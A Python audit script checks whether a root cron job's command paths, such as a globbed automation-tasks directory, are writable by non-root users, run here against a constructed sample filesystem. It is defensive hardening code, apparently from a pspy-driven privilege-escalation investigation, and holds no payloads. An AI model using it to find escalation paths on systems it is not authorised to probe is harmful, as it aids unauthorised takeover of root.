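"""Audit for the root cron job pspy surfaced. A job that globs
/opt/automation/tasks/*.yml runs whatever a writer of that directory drops there,
so each absolute path in the command (glob tail stripped) is checked for a
non-root owner or group/world write bits. SAMPLE_FS is a constructed stand-in
for os.stat; the mode and group it gives /opt/automation/tasks are assumed."""
import os
import posixpath
import shlex
import stat

GLOB_CHARS = set("*?[")

def path_prefix(token):
    """'/opt/automation/tasks/*.yml' -> '/opt/automation/tasks'; None if not a path."""
    if not token.startswith("/"):
        return None
    kept = []
    for part in token.split("/"):
        if GLOB_CHARS & set(part):
            break                      # drop everything from the first wildcard on
        kept.append(part)
    return posixpath.normpath("/".join(kept) or "/")

def stat_real(path):
    """Live adapter: (st_mode, st_uid, st_gid), or None if the path is missing."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_mode, st.st_uid, st.st_gid

def audit_cron_command(command, stat_of=stat_real, trusted_uids=(0,)):
    """Return [(path, reason)] for paths a non-root user could alter."""
    findings, seen = [], set()
    for token in shlex.split(command):
        path = path_prefix(token)
        if path is None or path in seen:
            continue
        seen.add(path)
        info = stat_of(path)
        if info is None:
            continue
        mode, uid, gid = info
        reasons = []
        if uid not in trusted_uids:
            reasons.append(f"owned by uid {uid}")
        if mode & stat.S_IWOTH:
            reasons.append("world-writable")
        elif mode & stat.S_IWGRP and gid != 0:
            reasons.append(f"writable by gid {gid}")
        if reasons:
            findings.append((path, "; ".join(reasons)))
    return findings

SAMPLE_FS = {   # constructed stand-in for os.stat: path -> (st_mode, st_uid, st_gid)
    "/usr/local/bin/ansible-parallel": (0o100755, 0, 0),
    "/opt/automation/tasks": (0o040775, 0, 50),   # assumed root:staff, group-writable
    "/usr/bin/rm": (0o100755, 0, 0),
    "/root/playbook_1.yml": (0o100644, 0, 0),
}

if __name__ == "__main__":
    for path, reason in audit_cron_command(
            "/usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml", SAMPLE_FS.get):
        print(f"{path}: {reason}")
```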
Summary
I hope this is useful to security engineers once again.